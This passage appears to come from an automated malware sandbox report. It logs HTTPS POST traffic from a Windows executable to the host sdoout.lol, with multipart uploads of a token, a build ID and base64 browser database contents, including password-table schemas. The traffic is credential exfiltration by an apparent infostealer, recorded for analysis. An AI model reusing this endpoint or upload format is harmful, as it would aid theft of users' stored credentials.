                                                                                                                                                                                                                                                                                          2024-12-30 14:55:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:36 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                          Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:37 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          25192.168.2.953891116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:37 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----gva1noz5pphvaasr1dbs
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 68733
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 67 76 61 31 6e 6f 7a 35 70 70 68 76 61 61 73 72 31 64 62 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 67 76 61 31 6e 6f 7a 35 70 70 68 76 61 61 73 72 31 64 62 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 67 76 61 31 6e 6f 7a 35 70 70 68 76 61 61 73 72 31 64 62 73 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------gva1noz5pphvaasr1dbsContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------gva1noz5pphvaasr1dbsContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------gva1noz5pphvaasr1dbsCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:37 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                          Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:37 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                          Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:38 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          26192.168.2.953899116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----myuai5x4w47gv3eus0hd
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 262605
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6d 79 75 61 69 35 78 34 77 34 37 67 76 33 65 75 73 30 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 6d 79 75 61 69 35 78 34 77 34 37 67 76 33 65 75 73 30 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 6d 79 75 61 69 35 78 34 77 34 37 67 76 33 65 75 73 30 68 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------myuai5x4w47gv3eus0hdContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------myuai5x4w47gv3eus0hdContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------myuai5x4w47gv3eus0hdCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
